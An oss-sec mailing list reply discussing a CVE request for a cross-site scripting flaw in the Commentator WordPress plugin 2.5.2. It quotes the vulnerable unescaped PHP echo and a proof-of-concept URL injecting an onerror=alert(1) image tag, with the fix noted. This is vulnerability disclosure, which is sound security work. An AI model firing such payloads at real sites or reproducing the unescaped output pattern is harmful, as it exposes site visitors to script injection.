oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CVE Request: Commentator WordPress Plugin 2.5.2 XSS Vulnerability

From: Henri Salo <henri () nerv fi>
Date: Sat, 16 Jan 2016 13:45:44 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Wed, Jan 13, 2016 at 07:42:12PM +0530, Rahul Pratap Singh wrote:

I would request you to assign CVE id to this issue.

file: commentator.php

line:441
$provider_name = $_REQUEST["provider"];
line:544
<div id="commentator-social-signin" class="commentator-<?php echo
$provider_name; ?>">

/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook">%20<IMG%20SRC=axc%20onerror=alert(1)>

https://0x62626262.files.wordpress.com/2016/01/commentatorxsspoc.png
http://codecanyon.net/item/commentator-wordpress-plugin/6425752
https://0x62626262.wordpress.com/2016/01/13/commentator-wordpress-plugin-xss-vulnerability

Fix: Update to 2.5.3


Are you sure that this plugin is open source software? There is a plugin named
"commentator" in the WordPress Plugin Directory[1,2], but it seems to be
different codebase (might be older version) and last update is 2012-10-28. Item
in codecanyon.net requires paid license.

1: http://plugins.svn.wordpress.org/commentator/trunk/
2: http://plugins.svn.wordpress.org/commentator/trunk/readme.txt

- -- 
Henri Salo
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBAgAGBQJWmi1oAAoJECet96ROqnV0W9MQAM7/GMMtvzWRATSgzTXJhcw3
HnNwxM37fwyUOxxkAiwI0Qhb5btrZ4mnIK1oOpHZ1d55le/6GBdvxG28lmN9KZBs
8iiv26hX1D/+tDyXWLtRaZUwC46Mx7geoNoH55dk+MWip1LdhIDjc7eqvB26GT04
nq8y5gPHUv6VEtS/rgLzW6VVrATVxCTOvHMEzvxgbkHmntDRIaVsDk+krQ8HnlUM
U7x0REkQmvhM+lAascIaS0vYLz+Had1+Us4F+cA88FPpA2UGzXvRXOcoyYLGu5H+
99RgnTP1x1Lk6/1E5NYfSnyNwsS8wFsxw8SlUEbRJaEqFJSYjhHq0ho+yVTC9ekx
z2y0AfOZ/5xjsUZkJgJOwV9ovXVwhe1S55ChmgJRsQ20wc0w8qSgQVd+7+PEiMvb
ZJxie5x0vsc9X8jQPPBrYCA9RfDIQnNeYcebdECZm/zg0IvGBTKqu2ZSht8ndymC
W8yZop/BkXO9Ge1SLW2jpRkTJG6moH/k7b0X4Lim1GtaAi21hdUvgOZ8LLQnWk0G
AphLO8mSauqyEU5sY2g3zHMVbIGzjuQ8Iw2So1WNLdoxss5lm75YEhCij0bpVXSb
7bCLrlvxPtbphuEA2Mb8R9jPQ7xI66EqjOu+yZfyUnfY27Co7sCUGUnkLGoxfhHU
t0yWufUCj9ZCW7lfA01K
=dsWg
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: